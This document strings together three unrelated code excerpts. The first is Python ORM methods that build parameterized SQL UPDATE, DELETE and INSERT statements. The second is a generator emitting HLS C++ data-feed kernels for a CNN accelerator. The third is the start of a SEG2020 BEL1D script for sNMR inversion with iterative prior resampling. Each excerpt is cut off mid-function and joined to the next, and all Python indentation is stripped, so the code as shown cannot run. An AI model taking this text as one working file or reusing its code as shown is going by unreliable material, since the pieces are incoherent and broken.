sql_attrs = self._validate_attrs(sql_attrs, decrypt=False)
db_attrs = self._validate_attrs(db_attrs, decrypt=False)
clean_attrs = dict(sql_attrs, **db_attrs)
for k in db_attrs:
# cache old db values
getattr(self._orig, k, None)
next_inst = self._clone()
next_inst.__setstate__(dict(self._data, **clean_attrs))
can_update = self._orig._will_update(
next_inst,
fields=clean_attrs.keys(),
)
if can_update is False:
self._rollback()
return False
if expressions:
expression, _params = self.unique_expression_and_params
if not _params:
raise ExpressionError('Cannot update this instance because of ' # noqa pragma: no cover
'the model has no primary_key '
'and unique_key')
sql_pieces, params = get_sql_pieces_and_params(expressions)
if _params:
params.extend(_params)
sql = (
'UPDATE `{table_name}` SET {columns} '
'WHERE {expression} '
).format(
table_name=self._get_table_name(),
columns=', '.join(sql_pieces),
expression=expression
)
try:
db.execute(sql, params)
if db.autocommit:
db.commit()
except Exception:
if db.autocommit:
db.rollback() # pragma: no cover
raise
dynamic_exps = [
exp for exp in expressions if isinstance(exp.right, Expression)
]
if dynamic_exps:
keys = map(lambda x: x.left.attr_name, dynamic_exps)
q = self.__class__.query(*keys).filter(**{
attr_name: getattr(self, attr_name)
for attr_name in self.__primary_key__
})
values = q.first()
if not isinstance(values, tuple):
values = [values]
_attrs = dict(izip(keys, values))
sql_attrs.update(self._parse_attrs(_attrs))
before_update.send(self)
clean_attrs = dict(sql_attrs, **db_attrs)
self._data.update(clean_attrs)
for k in clean_attrs:
self._parsed_data.pop(k, None)
for k, v in db_attrs.iteritems():
field = getattr(self.__class__, k)
field.db_set(self, v)
_orig = self._orig
def func():
db.commit_beansdb()
after_update.send(self)
self.after_update()
if _orig is not None:
self._orig = None
self._did_update(
_orig,
fields=chain.from_iterable([
sql_attrs.iterkeys(),
db_attrs.iterkeys(),
])
)
def rollback_handler():
self._rollback()
if db.autocommit:
func()
else:
db.add_lazy_func(func)
db.add_rollback_handler(rollback_handler)
return True
def delete(self, **kwargs):
if self.before_delete(**kwargs) is False:
return
expression, params = self.unique_expression_and_params
if not params:
raise ExpressionError('Cannot delete this instance because of ' # noqa pragma: no cover
'the model has no primary_key '
'and unique_key')
sql = (
'DELETE FROM `{table_name}` '
'WHERE {expression} '
).format(
table_name=self._get_table_name(),
expression=expression
)
db = self._get_db()
db.execute(sql, params)
def func():
after_delete.send(self)
self.after_delete(**kwargs)
if db.autocommit:
db.commit()
func()
else:
db.add_lazy_func(func)
return True
@override
def to_json(self):
return self.to_dict(jsonize=True)
@override
def to_dict(self, excludes=None, parsers=None,
type_parsers=None, jsonize=False):
excludes = excludes or []
parsers = parsers or {}
if type_parsers is None:
type_parsers = {}
if jsonize:
type_parsers.update({
datetime: _datetime_parser,
date: _date_parser,
})
res = {}
for k in chain(self.__all_fields__, self.__exported_property_names__):
if k in excludes:
continue
v = getattr(self, k)
if isinstance(v, Field):
continue # pragma: no cover
parser = parsers.get(k, _default_parser)
parser = type_parsers.get(type(v), parser)
res[k] = parser(v)
return res
@classmethod
def _olo_get_field(cls, attr_name):
if attr_name not in cls.__fields__:
return
return getattr(cls, attr_name)
@classmethod
def _olo_get_db_field(cls, attr_name):
if attr_name not in cls.__db_fields__:
return
return getattr(cls, attr_name)
@classmethod
def _split_attrs(cls, attrs, collect_expression=True):
expressions = []
sql_attrs = {}
db_attrs = {}
for k, v in attrs.iteritems():
if k in cls.__db_fields__:
db_attrs[k] = v
elif k in cls.__fields__:
if not isinstance(v, Expression):
sql_attrs[k] = v
if collect_expression:
f = getattr(cls, k)
v = cls._deparse_attrs({k: v})[k]
expressions.append(BinaryExpression(f, v, '='))
return expressions, sql_attrs, db_attrs
@classmethod
def _check_attrs(cls, attrs):
key = '_olo_dir_cache'
cls_attrs = cls.__dict__.get(key)
if cls_attrs is None:
cls_attrs = set(dir(cls))
setattr(cls, key, cls_attrs)
invalid_attrs = set(attrs) - cls_attrs
if invalid_attrs:
raise InvalidFieldError(
'Cannot found the attributes from {}: {}'.format(
cls.__name__,
', '.join(invalid_attrs)
)
)
@classmethod
def _wash_attrs(cls, attrs):
return {
k: v
for k, v in attrs.iteritems()
if v is not missing
}
@classmethod
def _map_attrs(cls, attrs):
return { # pragma: no cover
getattr(cls, k).name: v
for k, v in attrs.iteritems()
}
@classmethod
def create(cls, **attrs):
inst = cls._olo_instantiate(
_olo_is_new=True, **attrs
)
if inst._olo_insert():
return inst
def _olo_insert(self):
if not self._olo_is_new:
return False # pragma: no cover
before_create_is_instance_method = getattr(self.before_create, '__self__', None) is self # noqa pylint: disable=C
if before_create_is_instance_method:
bcr = self.before_create()
attrs = dict(self._data)
_, sql_attrs, db_attrs = self._split_attrs(attrs)
if not before_create_is_instance_method:
bcr = self.before_create(**attrs) # pragma: no cover
if bcr is False:
return False
self._validate_attrs(attrs, parse=True,
decrypt=self._olo_decrypt)
db = self._get_db()
expressions, _, _ = self._split_attrs(sql_attrs)
if expressions:
sql_pieces = []
params = []
for exp in expressions:
piece, _ = sql_and_params(exp.left)
_, _params = sql_and_params(exp)
sql_pieces.append(piece)
if _params:
params.extend(_params)
sql = (
'INSERT INTO `{table_name}`({columns}) '
'VALUES({values}) '
).format(
table_name=self._get_table_name(),
columns=', '.join(sql_pieces),
values=', '.join(['%s'] * len(params))
)
try:
id_ = db.execute(sql, params)
if db.autocommit:
db.commit()
except Exception:
if db.autocommit:
db.rollback() # pragma: no cover
raise
pk_name = self.get_singleness_pk_name()
if (
hasattr(self.__class__, pk_name) and
pk_name in self.__class__.__fields__ and
pk_name not in self._data
):
self._data[pk_name] = id_
# need thinking
self._extend_missing_data()
for k, v in db_attrs.iteritems():
field = getattr(self.__class__, k)
field.db_set(self, v)
self._olo_is_new = False
def rollback_handler():
self._olo_is_new = True
def func():
db.commit_beansdb()
after_insert.send(self)
if getattr(self.after_create, '__self__', None) is self:
self.after_create()
else:
self.after_create(self) # pragma: no cover pylint: disable=E
if db.autocommit:
func()
else:
db.add_lazy_func(func)
db.add_rollback_handler(rollback_handler)
return True
@classmethod
def get_singleness_pk_attr_name(cls):
pk = cls.__primary_key__
pkl = len(pk)
if pkl != 1:
raise ExpressionError(
'This method only support singleness primary key now. '
'But your primary key has {} keys'.format(pkl)
)
return list(pk)[0]
@classmethod
def get_singleness_pk_field(cls):
attr_name = cls.get_singleness_pk_attr_name()
return getattr(cls, attr_name)
@classmethod
def get_singleness_pk_name(cls, default='id'):
try:
field = cls.get_singleness_pk_field()
except ExpressionError:
return default
return field.name
def _get_singleness_pk_value(self):
field = self.get_singleness_pk_field()
return getattr(self, field.attr_name)
def _olo_get_pk_value(self):
pk = self.__primary_key__
return tuple(getattr(self, attr_name) for attr_name in pk)
def _olo_get_signature(self):
pk_value = self._olo_get_pk_value()
return (self.__table_name__,) + pk_value
def _extend_missing_data(self):
missing_fields = [
getattr(self.__class__, k) for k in self.__fields__
if k not in self._data
]
if not missing_fields:
return # pragma: no cover
pk_dict = self._get_pk_dict()
if not pk_dict:
raise Exception('No pk dict!!!') # pragma: no cover
values = self.__class__.query(*missing_fields).filter(
**pk_dict
).first()
if len(missing_fields) == 1 and values is not None and not isinstance(values, list):
values = [values]
if values:
self._data.update(
dict(izip(map(lambda f: f.attr_name, missing_fields), values))
)
def _get_pk_dict(self):
dct = {}
for attr_name in self.__primary_key__:
v = getattr(self, attr_name, missing)
if v is not missing:
dct[attr_name] = v
return dct
@classmethod
def _get(cls, id=None, **kwargs):
if not kwargs:
pk_name = cls.get_singleness_pk_name()
return cls._get_by(**{pk_name: id})
return cls._get_by(**kwargs)
@classmethod
def get(cls, id=None, **kwargs):
opt = cls._options
if opt.cache_client and opt.auto_use_cache:
return cls.cache.get(id=id, **kwargs)
return cls._get(id=id, **kwargs)
@classmethod
def _get_multi(cls, idents, filter_none=True):
if not idents:
return []
if not type_checker([dict], idents):
pk_name = cls.get_singleness_pk_name()
pk_field = getattr(cls, pk_name)
items = cls._get_multi_by(pk_field.in_(idents))
mapping = {str(getattr(item, pk_name)): item for item in items}
else:
ident = idents[0]
| |
code.append(indent(2) + 'initial_round++;\n')
code.append(indent(2) + 'LAYER_OUT_NUM_T_prev = LAYER_OUT_NUM_T;\n')
code.append(indent(2) + 'LAYER_IN_IMG_H_T_prev = LAYER_IN_IMG_H_T;\n')
code.append(indent(2) + 'LAYER_IN_IMG_W_T_prev = LAYER_IN_IMG_W_T;\n')
code.append(indent(2) + 'LAYER_COL_IL_FACTOR_prev = LAYER_COL_IL_FACTOR;\n')
code.append(indent(2) + 'LAYER_STRIDE_prev = LAYER_STRIDE;\n\n')
indent_level = 2
code.append(indent(indent_level) + 'task_iter += 1;\n')
code.append(indent(indent_level) + 'if (task_iter == LAYER_TASK_NUM2){\n')
code.append(indent(indent_level + 1) + 'task_iter = 0;\n')
code.append(indent(indent_level + 1) + 'layer_iter += 1;\n')
code.append(indent(indent_level + 1) + 'layer_start = 1;\n')
code.append(indent(indent_level + 1) + 'if (layer_iter == LAYER_BATCH){\n')
code.append(indent(indent_level + 2) + 'layer_iter = 0;\n')
code.append(indent(indent_level + 2) + 'done = 1;\n')
code.append(indent(indent_level + 1) + '}\n')
code.append(indent(indent_level) + '}\n')
# code.append(indent(indent_level) + 'out_h_iter += %sOUT_IMG_H_T;\n' % (var_prefix))
# code.append(indent(indent_level) + 'if (out_h_iter >= LAYER_OUT_IMG_H){\n')
# code.append(indent(indent_level + 1) + 'out_h_iter = 0;\n')
# code.append(indent(indent_level + 1) + 'out_w_iter += %sOUT_IMG_W_T;\n' % (var_prefix))
# code.append(indent(indent_level + 1) + 'if (out_w_iter >= LAYER_OUT_IMG_W){\n')
# code.append(indent(indent_level + 2) + 'out_w_iter = 0;\n')
# code.append(indent(indent_level + 2) + 'out_num_iter += LAYER_OUT_NUM_T;\n')
# code.append(indent(indent_level + 2) + 'if (out_num_iter >= LAYER_OUT_NUM){\n')
# code.append(indent(indent_level + 3) + 'out_num_iter = 0;\n')
# code.append(indent(indent_level + 3) + 'layer_iter += 1;\n')
# code.append(indent(indent_level + 3) + 'layer_start = 1;\n')
# code.append(indent(indent_level + 3) + 'if (layer_iter == LAYER_BATCH){\n')
# code.append(indent(indent_level + 4) + 'layer_iter = 0;\n')
# code.append(indent(indent_level + 4) + 'done = 1;\n')
# code.append(indent(indent_level + 3) + '}\n')
# code.append(indent(indent_level + 2) + '}\n')
# code.append(indent(indent_level + 1) + '}\n')
# code.append(indent(indent_level) + '}\n')
code.append(indent(1) + '}\n\n')
code.append(indent(1) + 'if (initial_round % 2 == 1){\n')
code.append(indent(2) + var_prefix + 'Data' + str(idx) + 'WriteDataLast(ping_buffer, fifo_transfer_out, engine_id, LAYER_OUT_NUM_T_prev, LAYER_IN_IMG_H_T_prev, LAYER_IN_IMG_W_T_prev, LAYER_COL_IL_FACTOR_prev, LAYER_STRIDE_prev);\n')
code.append(indent(1) + '} else {\n')
code.append(indent(2) + var_prefix + 'Data' + str(idx) + 'WriteDataLast(pong_buffer, fifo_transfer_out, engine_id, LAYER_OUT_NUM_T_prev, LAYER_IN_IMG_H_T_prev, LAYER_IN_IMG_W_T_prev, LAYER_COL_IL_FACTOR_prev, LAYER_STRIDE_prev);\n')
code.append(indent(1) + '}\n')
code.append('}\n\n')
idx += 1
return code
def loader(desp, config):
code = []
var_prefix = 'U%s' %(desp['KERNEL_ID']) + '_'
idx = 0
for op_name in desp['OP_NAME']:
if desp['APP_NAME'] == 'cnn':
# TODO: temporary solution
# shim
if idx == 0:
code.append('void ' + var_prefix + 'DataFeed' + str(idx) + 'Head_Shim(\n')
code.append(indent(1) + var_prefix + 'bus_t' + str(idx) + '* ' + op_name + ',\n')
code.append(indent(1) + 'stream<ap_uint<' + var_prefix + 'DATA' + str(idx) + '_WIDTH * ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR> > &fifo_transfer_' + op_name + ',\n')
code.append(indent(1) + 'uint LAYER_IN_NUM,\n')
code.append(indent(1) + 'uint LAYER_OUT_NUM,\n')
code.append(indent(1) + 'uint LAYER_IN_NUM_T,\n')
code.append(indent(1) + 'uint LAYER_OUT_NUM_T,\n')
code.append(indent(1) + 'uint LAYER_IN_IMG_H,\n')
code.append(indent(1) + 'uint LAYER_IN_IMG_W,\n')
code.append(indent(1) + 'uint LAYER_OUT_IMG_H,\n')
code.append(indent(1) + 'uint LAYER_OUT_IMG_W,\n')
code.append(indent(1) + 'uint LAYER_IN_IMG_H_T,\n')
code.append(indent(1) + 'uint LAYER_IN_IMG_W_T,\n')
code.append(indent(1) + 'uint LAYER_FILTER_S,\n')
code.append(indent(1) + 'uint LAYER_STRIDE,\n')
code.append(indent(1) + 'uint LAYER_BATCH,\n')
code.append(indent(1) + 'stream<%sConfigInst> &fifo_kernel_config_out\n' % (var_prefix))
code.append('){\n')
code.append('#pragma HLS INLINE off\n\n')
code.append(indent(1) + 'uint LAYER_TASK_NUM1 = (LAYER_IN_NUM / LAYER_IN_NUM_T) * (LAYER_OUT_NUM / LAYER_OUT_NUM_T) * (LAYER_OUT_IMG_H / LAYER_IN_IMG_H_T * LAYER_STRIDE) * (LAYER_OUT_IMG_W / LAYER_IN_IMG_W_T * LAYER_STRIDE);\n')
code.append(indent(1) + 'uint LAYER_TASK_NUM2 = (LAYER_OUT_NUM / LAYER_OUT_NUM_T) * (LAYER_OUT_IMG_H / LAYER_IN_IMG_H_T * LAYER_STRIDE) * (LAYER_OUT_IMG_W / LAYER_IN_IMG_W_T * LAYER_STRIDE);\n')
code.append(indent(1) + 'uint LAYER_LOCAL_ACCUM_NUM = LAYER_IN_NUM_T / %sSIMD_FACTOR * LAYER_FILTER_S * LAYER_FILTER_S;\n' %(var_prefix))
code.append(indent(1) + 'uint LAYER_LOCAL_REG_NUM = (LAYER_IN_IMG_H_T / LAYER_STRIDE) * (LAYER_IN_IMG_W_T / %sSA_COLS / LAYER_STRIDE) * LAYER_OUT_NUM_T / %sSA_ROWS;\n' % (var_prefix, var_prefix))
code.append(indent(1) + 'uint LAYER_ROW_IL_FACTOR = LAYER_OUT_NUM_T / %sSA_ROWS;\n' % (var_prefix))
code.append(indent(1) + 'uint LAYER_COL_IL_FACTOR = LAYER_IN_IMG_W_T / %sSA_COLS / LAYER_STRIDE;\n\n' % (var_prefix))
code.append(indent(1) + 'ap_uint<32> CIN_OFFSET = 0;\n')
code.append(indent(1) + 'ap_uint<32> WEIGHT_OFFSET = 0;\n')
code.append(indent(1) + 'ap_uint<32> BIAS_OFFSET = 0;\n')
code.append(indent(1) + 'ap_uint<32> COUT_OFFSET = 0;\n')
code.append(indent(1) + 'ap_uint<16> FILTER_S1 = LAYER_FILTER_S;\n')
code.append(indent(1) + 'ap_uint<16> FILTER_S2 = LAYER_FILTER_S;\n')
code.append(indent(1) + 'ap_uint<32> STRIDE = LAYER_STRIDE;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_EN = 0;\n')
# code.append(indent(1) + 'ap_uint<32> LAYER_BATCH = LAYER_BATCH;\n\n')
code.append(indent(1) + 'ap_uint<32> LAYER_IN_NUM_cast = LAYER_IN_NUM;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_OUT_NUM_cast = LAYER_OUT_NUM;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_IN_NUM_T_cast = LAYER_IN_NUM_T;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_OUT_NUM_T_cast = LAYER_OUT_NUM_T;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_IN_IMG_H_T_cast = LAYER_IN_IMG_H_T;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_IN_IMG_W_T_cast = LAYER_IN_IMG_W_T;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_IN_IMG_H_cast = LAYER_IN_IMG_H;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_IN_IMG_W_cast = LAYER_IN_IMG_W;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_OUT_IMG_H_cast = LAYER_OUT_IMG_H;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_OUT_IMG_W_cast = LAYER_OUT_IMG_W;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_BATCH_cast = LAYER_BATCH;\n\n')
code.append(indent(1) + 'ap_uint<32> LAYER_TASK_NUM1_cast = LAYER_TASK_NUM1;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_TASK_NUM2_cast = LAYER_TASK_NUM2;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_LOCAL_ACCUM_NUM_cast = LAYER_LOCAL_ACCUM_NUM;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_LOCAL_REG_NUM_cast = LAYER_LOCAL_REG_NUM;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_ROW_IL_FACTOR_cast = LAYER_ROW_IL_FACTOR;\n')
code.append(indent(1) + 'ap_uint<32> LAYER_COL_IL_FACTOR_cast = LAYER_COL_IL_FACTOR;\n\n')
code.append(indent(1) + var_prefix + 'bus_t%d %s_buf[%sDATA%d_HEAD_BUF_SIZE / %sDATA%d_PACK_FACTOR];\n' % (idx, op_name, var_prefix, idx, var_prefix, idx))
code.append(indent(1) + 'ap_uint<' + var_prefix + 'DATA' + str(idx) + '_WIDTH * ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR> sel_tmp[' + var_prefix + 'DATA' + str(idx) + '_PACK_FACTOR / ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR];\n')
code.append('#pragma HLS ARRAY_PARTITION variable=sel_tmp complete dim=1\n\n')
w = cal_width(desp['PARAMETERS']['LAYER_BATCH'])
code.append(indent(1) + 'for (ap_uint<%d> layer_iter = 0; layer_iter < LAYER_BATCH; layer_iter++){\n' % (w))
code.append(indent(2) + '%sConfigInst inst0 = (LAYER_OUT_IMG_W_cast, LAYER_OUT_IMG_H_cast, LAYER_IN_IMG_W_cast, LAYER_IN_IMG_H_cast, LAYER_OUT_NUM_cast, LAYER_IN_NUM_cast);\n' % (var_prefix))
code.append(indent(2) + '%sConfigInst inst1 = (LAYER_OUT_IMG_W_cast, LAYER_OUT_IMG_H_cast, LAYER_IN_IMG_W_cast, LAYER_IN_IMG_H_cast, LAYER_OUT_NUM_cast, LAYER_IN_NUM_cast);\n' % (var_prefix))
code.append(indent(2) + '%sConfigInst inst2 = (STRIDE, FILTER_S2, FILTER_S1, COUT_OFFSET, BIAS_OFFSET, WEIGHT_OFFSET, CIN_OFFSET);\n' % (var_prefix))
code.append(indent(2) + '%sConfigInst inst3 = (LAYER_BATCH_cast, LAYER_IN_IMG_W_T_cast, LAYER_IN_IMG_H_T_cast, LAYER_OUT_NUM_T_cast, LAYER_IN_NUM_T_cast, LAYER_EN);\n' % (var_prefix))
code.append(indent(2) + '%sConfigInst inst4 = (LAYER_COL_IL_FACTOR_cast, LAYER_ROW_IL_FACTOR_cast, LAYER_LOCAL_REG_NUM_cast, LAYER_LOCAL_ACCUM_NUM_cast, LAYER_TASK_NUM2_cast, LAYER_TASK_NUM1_cast);\n\n' % (var_prefix))
code.append(indent(2) + 'fifo_kernel_config_out.write(inst0);\n')
code.append(indent(2) + 'fifo_kernel_config_out.write(inst1);\n')
code.append(indent(2) + 'fifo_kernel_config_out.write(inst2);\n')
code.append(indent(2) + 'fifo_kernel_config_out.write(inst3);\n')
code.append(indent(2) + 'fifo_kernel_config_out.write(inst4);\n\n')
code.append(indent(2) + 'for (int out_img_h_t = 0; out_img_h_t < LAYER_OUT_IMG_H; out_img_h_t += LAYER_IN_IMG_H_T / LAYER_STRIDE){\n')
code.append(indent(3) + 'for (int out_img_w_t = 0; out_img_w_t < LAYER_OUT_IMG_W; out_img_w_t += LAYER_IN_IMG_W_T / LAYER_STRIDE){\n')
code.append(indent(4) + 'for (int out_num_t = 0; out_num_t < LAYER_OUT_NUM; out_num_t += LAYER_OUT_NUM_T){\n')
code.append(indent(5) + 'uint chunk_offset = out_img_h_t * LAYER_IN_IMG_W * LAYER_IN_NUM;\n')
code.append(indent(5) + 'for (int in_img_h_t = 0; in_img_h_t < LAYER_IN_IMG_H_T + LAYER_FILTER_S - 1; in_img_h_t++){\n')
code.append(indent(6) + 'uint local_chunk_offset = chunk_offset + in_img_h_t * LAYER_IN_IMG_W * LAYER_IN_NUM + out_img_w_t * LAYER_IN_NUM;\n')
code.append(indent(6) + 'memcpy((void*)(cin_buf + in_img_h_t * (LAYER_IN_IMG_W_T + LAYER_FILTER_S - 1) * LAYER_IN_NUM / %sDATA%d_PACK_FACTOR), (void*)(cin + local_chunk_offset / %sDATA%d_PACK_FACTOR), sizeof(%sdata_t%d) * (LAYER_IN_IMG_W_T + LAYER_FILTER_S - 1) * LAYER_IN_NUM);\n' % (var_prefix, idx, var_prefix, idx, var_prefix, idx))
code.append(indent(5) + '}\n')
code.append(indent(5) + 'for (int in_num_t = 0; in_num_t < LAYER_IN_NUM; in_num_t += LAYER_IN_NUM_T){\n')
code.append(indent(6) + 'for (int ii = 0; ii < LAYER_IN_NUM_T / %sDATA%d_FC_SIMD_FACTOR; ii++){\n' % (var_prefix, idx))
code.append(indent(7) + 'for (int hh = 0; hh < LAYER_IN_IMG_H_T + LAYER_FILTER_S - 1; hh++){\n')
code.append(indent(8) + 'for (int ww = 0; ww < LAYER_IN_IMG_W_T + LAYER_FILTER_S - 1; ww++){\n')
code.append('#pragma HLS PIPELINE II=1\n')
code.append(indent(9) + 'uint cin_local_idx = hh * (LAYER_IN_IMG_W_T + LAYER_FILTER_S - 1) * LAYER_IN_NUM + ww * LAYER_IN_NUM + (in_num_t + ii * %sDATA0_FC_SIMD_FACTOR);\n' % (var_prefix))
code.append(indent(9) + 'uint cin_bus_idx = cin_local_idx / %sDATA%d_PACK_FACTOR;\n' % (var_prefix, idx))
code.append(indent(9) + 'uint cin_bus_offset = cin_local_idx %% %sDATA%d_PACK_FACTOR;\n' % (var_prefix, idx))
code.append(indent(9) + '%sbus_t%d bus_data = cin_buf[cin_bus_idx];\n' % (var_prefix, idx))
code.append(indent(9) + 'ap_uint<%sDATA%d_WIDTH * %sDATA%d_FC_SIMD_FACTOR> fifo_cin_data;\n' % (var_prefix, idx, var_prefix, idx))
unroll_w = cal_width(desp['BUS_WIDTH'][idx] / desp['DATA_WIDTH'][idx] / desp['FC_SIMD_FACTOR'][idx])
code.append(indent(9) + 'for (ap_uint<' + str(unroll_w) + '> s = 0; s < ' + var_prefix + 'DATA' + str(idx) + '_PACK_FACTOR / ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR; s++){\n')
code.append('#pragma HLS UNROLL\n')
code.append(indent(10) + 'sel_tmp[s] = bus_data(' + var_prefix + 'DATA' + str(idx) + '_WIDTH * ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR - 1, 0);\n')
code.append(indent(10) + 'bus_data = bus_data >> (' + var_prefix + 'DATA' + str(idx) + '_WIDTH * ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR);\n')
code.append(indent(9) + '}\n')
code.append(indent(9) + 'fifo_cin_data = sel_tmp[cin_bus_offset / %sDATA%d_FC_SIMD_FACTOR];\n' % (var_prefix, idx))
code.append(indent(9) + 'fifo_transfer_cin.write(fifo_cin_data);\n')
code.append(indent(8) + '}\n')
code.append(indent(7) + '}\n')
code.append(indent(6) + '}\n')
code.append(indent(5) + '}\n')
code.append(indent(4) + '}\n')
code.append(indent(3) + '}\n')
code.append(indent(2) + '}\n')
code.append(indent(1) + '}\n')
code.append('}\n\n')
elif idx == 1:
code.append('void ' + var_prefix + 'DataFeed' + str(idx) + 'Head_Shim(\n')
code.append(indent(1) + var_prefix + 'bus_t' + str(idx) + '* ' + op_name + ',\n')
code.append(indent(1) + 'stream<ap_uint<' + var_prefix + 'DATA' + str(idx) + '_WIDTH * ' + var_prefix + 'DATA' + str(idx) + '_FC_SIMD_FACTOR> > &fifo_transfer_' + op_name + ',\n')
code.append(indent(1) + 'uint LAYER_IN_NUM,\n')
code.append(indent(1) + 'uint | |
<gh_stars>1-10
'''
SEG2020 is a script that runs all the computations for the different results
presented at the SEG2020 conference (Houston, Texas).
***Improving BEL1D accuracy for geophysical imaging of the subsurface***
It runs at first the numerical benchmark for a dataset that is created directly.
- Creating the dataset
- Running BEL1D (initialization + first iteration)
- Presenting graphs of the results
- Applying IPR
- Presenting graphs of the improved result
- Comparing to McMC results from DREAM (results provided in github)
Then, it runs the same for the Mont Rigi dataset and presents simply the obtained profile.
Author:
<NAME>
ULiège, UGent, F.R.S.-FNRS
hadrien[dot]michel[at]uliege[dot]be
(c) August 2020
'''
def round_to_5(x,n=1):
import math as mt
# Modified from: https://stackoverflow.com/questions/3410976/how-to-round-a-number-to-significant-figures-in-python
tmp = [(round(a, -int(mt.floor(mt.log10(abs(a)))) + (n-1)) if a != 0.0 else 0.0) for a in x]
return tmp
if __name__=='__main__':
import numpy as np
from pyBEL1D import BEL1D
from pyBEL1D.utilities import Tools
from matplotlib import pyplot
from pathos import multiprocessing as mp
from pathos import pools as pp
import time
################################################################################
### ###
### Numerical Benchmarking ###
### ###
################################################################################
Benchmark = True
if Benchmark:
# 1) Creating the dataset:
from pygimli.physics import sNMR
KernelBench = "Data/sNMR/Tx50Rx50.mrsk" # A kernel file generated by MRSMatlab (Mueller-Petke et al., 2012)
nbLayer = 3 # 2 layers and a half-space
TimingBench = np.arange(0.005,0.5,0.001) # The time vector for the model
# KFile = sNMR.MRS()
# KFile.loadKernel(KernelBench)
# ModellingMethod = sNMR.MRS1dBlockQTModelling(nlay=nbLayer,K=KFile.K,zvec=KFile.z,t=TimingBench)
ModelBench = np.asarray([25, 25, 0.05, 0.25, 0.1, 0.1, 0.2, 0.05])
Noise = 10 # nV
# DatasetBench = ModellingMethod.response(ModelBench)
# DatasetBench += np.random.normal(loc=0, scale=Noise*1e-9,size=DatasetBench.shape) # Adding noise to the dataset
# np.save('sNMR_Bench_Dataset',DatasetBench)# To use in the McMC algorithm
DatasetBench = np.load('sNMR_Bench_Dataset.npy') # Load the dataset that was already created and run in McMC
# 2) Initializing BEL1D:
priorBench = np.array([[0.0, 50.0, 0.0, 0.15, 0.0, 0.5], [0.0, 50.0, 0.15, 0.50, 0.0, 0.5], [0.0, 0.0, 0.0, 0.15, 0.0, 0.5]])
# Initialsizing the parameters:
start = time.time()
ModelParam = BEL1D.MODELSET.SNMR(prior=priorBench, Kernel=KernelBench, Timing=TimingBench)
# 3) Running pre-BEL operations:
nbSampled = 10000
PreBEL_Bench = BEL1D.PREBEL(ModelParam,nbModels=nbSampled)
PreBEL_Bench.run()
# 4) Sampling 10000 models from the posterior:
PostBEL_Bench = BEL1D.POSTBEL(PreBEL_Bench)
PostBEL_Bench.run(Dataset=DatasetBench,nbSamples=nbSampled,NoiseModel=Noise)
end = time.time()
PostBEL_Bench.KDE.ShowKDE(Xvals=PostBEL_Bench.CCA.transform(PostBEL_Bench.PCA['Data'].transform(np.reshape(DatasetBench,(1,-1)))))
PostBEL_Bench.ShowDataset(RMSE=True)
CurrentGraph = pyplot.gcf()
CurrentGraph = CurrentGraph.get_axes()[0]
CurrentGraph.plot(TimingBench,DatasetBench[:len(TimingBench)],'k',linestyle='None',marker='o',markerfacecolor='None')
# Graph for the CCA space parameters loads
_, ax = pyplot.subplots()
B = PostBEL_Bench.CCA.y_loadings_
B = np.divide(np.abs(B).T,np.repeat(np.reshape(np.sum(np.abs(B),axis=0),(1,B.shape[0])),B.shape[0],axis=0).T)
ind = np.asarray(range(B.shape[0]))+1
ax.bar(x=ind,height=B[0],label=r'${}$'.format(PostBEL_Bench.MODPARAM.paramNames["NamesSU"][0]))
for i in range(B.shape[0]+1)[1:-1]:
ax.bar(x=ind,height=B[i],bottom=np.reshape(np.sum(B[0:i],axis=0),(B.shape[0],)),label=r'${}$'.format(PostBEL_Bench.MODPARAM.paramNames["NamesSU"][i]))
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width, box.height*0.8])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.4), ncol=3)
ax.set_ylabel('Relative contribution')
ax.set_xlabel('CCA dimension')
pyplot.show(block=False)
PostBEL_Bench.ShowPostModels(TrueModel=ModelBench,RMSE=True)
PostBEL_Bench.ShowPostCorr(TrueModel=ModelBench)
pyplot.show(block=False)
MODELS_1stITER = PostBEL_Bench.SAMPLES
MODELS_1stITER_DATA = PostBEL_Bench.SAMPLESDATA
PRE_MODS = PreBEL_Bench.MODELS
PRE_DATA = PreBEL_Bench.FORWARD
Postbel = PostBEL_Bench
Prebel = PreBEL_Bench
# 5) Applying IPR
nbIter = 100 # maximum number of iterations
tolerance = 5e-3 # Tolerance on the normalized difference between the distributions
nbParam = int(priorBench.size/2 - 1)
means = np.zeros((nbIter,nbParam))
stds = np.zeros((nbIter,nbParam))
timings = np.zeros((nbIter,))
MODELS_ITER = np.zeros((nbIter,nbSampled,nbParam)) # Store the models that have been computed
diverge = True
distancePrevious = 1e10
MixingUpper = 0
MixingLower = 1
for idxIter in range(nbIter):
PostbelLast = Postbel
PrebelLast = Prebel
if idxIter == 0: # Initialization: already done (see 2 and 3)
# PostbelTest.KDE.ShowKDE(Xvals=PostbelTest.CCA.transform(PostbelTest.PCA['Data'].transform(np.reshape(Dataset,(1,-1)))))
means[idxIter,:], stds[idxIter,:] = Postbel.GetStats()
timings[idxIter] = end-start
ModLastIter = Prebel.MODELS
else:
ModLastIter = Postbel.SAMPLES
# Here, we will use the POSTBEL2PREBEL function that adds the POSTBEL from previous iteration to the prior (Iterative prior resampling)
# However, the computations are longer with a lot of models, thus you can opt-in for the "simplified" option which randomely select up to 10 times the numbers of models
MixingUpper += 1
MixingLower += 1
Mixing = MixingUpper/MixingLower
